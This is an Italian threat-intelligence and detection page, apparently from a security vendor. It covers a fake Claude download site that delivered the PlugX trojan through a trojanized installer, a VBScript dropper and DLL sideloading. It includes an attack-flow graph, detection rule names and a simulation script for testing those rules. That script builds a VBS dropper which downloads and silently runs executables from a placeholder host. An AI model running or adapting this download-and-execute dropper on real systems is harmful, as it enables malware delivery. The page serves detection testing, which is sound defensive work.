Un sito fasullo di Claude installa malware che consente agli hacker di accedere al tuo computer
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
Gli aggressori hanno allestito una falsa pagina di download per Claude che distribuiva un archivio ZIP trojanizzato agli utenti ignari. Una volta aperto, l’archivio installava un client desktop Claude apparentemente legittimo mentre distribuisce segretamente il trojan PlugX mediante sideloading DLL con un aggiornamento firmato G DATA. Il payload malevolo veniva posizionato nella cartella di Avvio dell’utente per mantenere la persistenza e poi iniziava una comunicazione HTTPS verso un server di comando e controllo. La campagna dimostra come gli attori delle minacce sfruttano sempre più l’interesse per gli strumenti di intelligenza artificiale popolari come esca di ingegneria sociale per il compromesso iniziale.
Indagine
Durante l’analisi, i ricercatori hanno scompattato l’archivio ZIP, identificato il percorso di installazione dell’MSI e seguito l’esecuzione fino a un dropper VBScript che scriveva NOVUpdate.exe, un malevolo avk.dll, e un file di dati crittografato nella cartella di Avvio. L’esecuzione in sandbox ha confermato che il binario sideloaded veniva avviato con successo, modificava una chiave di registro correlata a TCP/IP e iniziava connessioni in uscita sulla porta 443 verso un indirizzo IP ospitato su Alibaba Cloud. Questi risultati hanno confermato la consegna di PlugX tramite una catena di infezione a stadi mascherata da software AI legittimo.
Mitigazione
Gli utenti dovrebbero scaricare il software Claude solo da fonti ufficiali verificate e convalidare l’autenticità dei pacchetti di installazione prima di eseguirli. I difensori dovrebbero ispezionare le cartelle di Avvio per binari o DLL inaspettati, specialmente i file che imitano componenti di aggiornamento legittimi. Anche il traffico HTTPS in uscita proveniente da applicazioni di nuova installazione dovrebbe essere rivisto tramite firewall e telemetria degli endpoint. Rimuovere i file dannosi, invertire eventuali modifiche non autorizzate al registro e eseguire una scansione anti-malware di fiducia sono passaggi chiave per contenere la minaccia.
Risposta
I team di sicurezza dovrebbero rilevare e allertare sulla presenza di NOVUpdate.exe, avk.dll, o NOVUpdate.exe.dat all’interno della directory di Avvio. Ulteriori rilevamenti dovrebbero concentrarsi sui binari firmati G DATA updater che caricano DLL non fidate e stabiliscono sessioni TLS in uscita inaspettate verso l’infrastruttura identificata. Gli host interessati dovrebbero essere sottoposti a piena remediation e revisione forense per confermare che nessun altro componente PlugX, meccanismo di persistenza o payload seguenti rimangano attivi.
graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[“<b>File</b> – Sito Claude falso<br/>Ospita ZIP malevolo”]:::file node_malicious_zip[“<b>File</b> – ZIP malevolo<br/>Contiene installer MSI trojanizzato”]:::file node_msi_installer[“<b>File</b> – Installer MSI trojanizzato”]:::file node_vbscript[“<b>Script</b> – Claude AI.vbs<br/>Copia file, avvia Claude, imposta persistenza”]:::script node_novupdate_exe[“<b>File</b> – NOVUpdate.exe<br/>Updater G DATA legittimo (DLL sideloading)”]:::file node_avk_dll[“<b>File</b> – avk.dll<br/>DLL malevola”]:::file node_dat_file[“<b>File</b> – NOVUpdate.exe.dat<br/>Payload cifrato”]:::file node_startup_folder[“<b>File</b> – Cartella di avvio<br/>Destinazione dei file copiati”]:::file node_shortcut[“<b>File</b> – Claude AI.lnk<br/>Collegamento che esegue VBScript”]:::file node_cleanup_batch[“<b>File</b> – cleanup.bat<br/>Rimozione artefatti malevoli”]:::file node_registry_key[“<b>Registro</b> – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters”]:::registry %% Nodes u2013 Techniques node_initial_access[“<b>Tecnica</b> – T1204.002 Esecuzione utente<br/>Download ZIP ed esecuzione MSI”]:::technique node_execution[“<b>Tecnica</b> – T1059.005 Visual Basic<br/>Esecuzione VBScript malevolo”]:::technique node_persistence_startup[“<b>Tecnica</b> – T1037.005 Elementi di avvio<br/>Copia nella cartella Startup”]:::persistence node_persistence_shortcut[“<b>Tecnica</b> – T1547.009 Modifica collegamenti”]:::persistence node_appcert_dll[“<b>Tecnica</b> – T1546.009 AppCert DLL<br/>DLL sideloading”]:::evasion node_obfuscation[“<b>Tecnica</b> – T1027.009 File offuscati<br/>Payload decrittato a runtime”]:::evasion node_registry_mod[“<b>Tecnica</b> – T1012 Query registro”]:::registry node_c2_proxy[“<b>Tecnica</b> – T1090.002 Proxy esterno”]:::c2 node_c2_web[“<b>Tecnica</b> – T1102 Servizio web”]:::c2 node_indicator_removal[“<b>Tecnica</b> – T1070.010 Rimozione tracce”]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion
Flusso di Attacco
Rilevamenti
LOLBAS WScript / CScript (tramite creazione_process)
Visualizza
Possibile utilizzo di Timeout per ritardare l’esecuzione (tramite cmdline)
Visualizza
Binary / Script sospetti in posizione di avvio automatico (tramite evento_file)
Visualizza
IoC (HashSha256) per rilevare: finto sito Claude installa malware che permette agli attaccanti di accedere al tuo computer
Visualizza
IoC (SourceIP) per rilevare: finto sito Claude installa malware che permette agli attaccanti di accedere al tuo computer
Visualizza
IoC (DestinationIP) per rilevare: finto sito Claude installa malware che permette agli attaccanti di accedere al tuo computer
Visualizza
Rileva WScript che rilascia ed esegue NOVUpdate.exe [Creazione Processo Windows]
Visualizza
Rilevazione installatore trojanizzato del sito finto Claude [Evento File Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il controllo pre‑volo di Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevazione. I comandi e il narrativo DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevazione. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa dell’Attacco & Comandi:
Un attaccante crea un script VBS malevolo che scarica il payloadNOVUpdate.exeda un server di comandi e controllo (C2), lo scrive in%TEMP%, e poi lo avvia tramitewscript.exe. Lo stesso script carica ancheavk.dlldalla stessa posizione per ottenere il sideloading DLL. L’attaccante si affida all’Host Script Windows (WSH) integrato per evitare di suscitare sospetti dalle euristiche AV tradizionali.- Scrivi il file VBS malevolo (
malicious.vbs) in%TEMP%. - Invoca
wscript.execon il percorso del file VBS. - Lo script VBS esegue un HTTP GET per scaricare
NOVUpdate.exeandavk.dll, li scrive su disco ed esegueNOVUpdate.exe.
- Scrivi il file VBS malevolo (
-
Script di Test di Regressione:
# -------------------------------------------------------------------- # Simulazione dropper malevolo – attiva la regola Sigma # -------------------------------------------------------------------- $tempDir = "$env:TEMPDropperDemo" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # 1. Crea VBS malevolo che scarica due file ed esegue NOVUpdate.exe $vbsPath = "$tempDirmalicious.vbs" $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.open "GET", "http://example.com/NOVUpdate.exe", False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$tempDirNOVUpdate.exe", 2 objStream.Close End If
‘ Scarica avk.dll (usato per il sideloading DLL) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If
‘ Esegui l’EXE rilasciato CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Esegui lo script via wscript.exe (questa è la telemetria che stiamo testando)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# OPZIONALE: pausa per consentire il rilevamento
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
-
Comandi di Pulizia:
# Rimuovi tutti gli artefatti creati dalla simulazione $tempDir = "$env:TEMPDropperDemo" if (Test-Path $tempDir) { Remove-Item -Path $tempDir -Recurse -Force } # Assicurati che eventuali processi NOVUpdate.exe rimasti siano terminati Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force